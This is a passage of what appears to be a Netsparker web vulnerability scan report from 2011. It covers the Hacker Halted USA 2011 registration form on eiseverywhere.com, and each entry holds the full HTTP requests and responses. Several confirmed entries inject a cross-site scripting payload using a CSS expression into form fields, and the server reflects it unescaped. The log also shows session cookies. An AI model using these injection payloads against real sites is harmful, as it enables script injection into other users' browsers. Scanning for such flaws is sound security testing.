/></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" checked="checked" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" ><td width="175" align="right" class="red">Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="3" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
selectcategoryid POST 65407
catpassword[65407] POST " stYle="x:expre/**/ssion(alert(9))
x POST 0
y POST 0 -----------------------------7db58107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=93b227c30d73481398999225106069fa
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=10h715k33ve8j1vg5o4cuabtg1
Content-Length: 1820
Accept-Encoding: gzip, deflate

--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="action"

preload_category
--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="eventid"

19301
--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="categoryid"

-1
--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="language"

eng
--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="reference"

3
--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="eb"

3
--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="admin"

-1
--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="bridgeid"

3
--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="discountcode"

3
--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="catpassword[65419]"

3
--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="catpassword[65420]"

3
--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="catpassword[65413]"

3
--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="catpassword[65411]"

3
--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="catpassword[65421]"

3
--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="selectcategoryid"

65407
--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="catpassword[65407]"

" stYle="x:expre/**/ssion(netsparker(9))
--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="x"

0
--93b227c30d73481398999225106069fa
Content-Disposition: form-data; name="y"

0
-----------------------------7db58107a156e--
--93b227c30d73481398999225106069fa--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:28:40 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3411
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [catpass65407] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" ><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" checked="checked" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" ><td width="175" align="right" class="red">Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
eventid POST 19301
categoryid POST 65410
language POST eng
reference POST " stYle="x:expre/**/ssion(alert(9))
eb POST 3
admin POST -1
bridgeid POST 3
input[email] POST netsparker@example.com
discountcode POST 3
selectcategoryid POST 65410 -----------------------------7db109117a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=38200838ecf144e8825b63b586c5d1d9
Host: www.eiseverywhere.com
Cookie: PHPSESSID=4v6m76svkgnnjt64tgo35hbip7; regtoken=8e5fsjfcos3c1mi4vieoq39ta6
Content-Length: 1163
Accept-Encoding: gzip, deflate

--38200838ecf144e8825b63b586c5d1d9
Content-Disposition: form-data; name="action"

submit
--38200838ecf144e8825b63b586c5d1d9
Content-Disposition: form-data; name="eventid"

19301
--38200838ecf144e8825b63b586c5d1d9
Content-Disposition: form-data; name="categoryid"

65410
--38200838ecf144e8825b63b586c5d1d9
Content-Disposition: form-data; name="language"

eng
--38200838ecf144e8825b63b586c5d1d9
Content-Disposition: form-data; name="reference"

" stYle="x:expre/**/ssion(netsparker(9))
--38200838ecf144e8825b63b586c5d1d9
Content-Disposition: form-data; name="eb"

3
--38200838ecf144e8825b63b586c5d1d9
Content-Disposition: form-data; name="admin"

-1
--38200838ecf144e8825b63b586c5d1d9
Content-Disposition: form-data; name="bridgeid"

3
--38200838ecf144e8825b63b586c5d1d9
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--38200838ecf144e8825b63b586c5d1d9
Content-Disposition: form-data; name="discountcode"

3
--38200838ecf144e8825b63b586c5d1d9
Content-Disposition: form-data; name="selectcategoryid"

65410
-----------------------------7db109117a156e--
--38200838ecf144e8825b63b586c5d1d9--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 16:30:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=2f6fefbm17gltsml9kkadfmqv4; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3103
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><!--Array( [cat] => 1 [fee] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
eventid POST 19301
categoryid POST 65410
language POST eng
reference POST 3
eb POST " stYle="x:expre/**/ssion(alert(9))
admin POST -1
bridgeid POST 3
input[email] POST netsparker@example.com
discountcode POST 3
selectcategoryid POST 65410 -----------------------------7db109117a156e--

Request

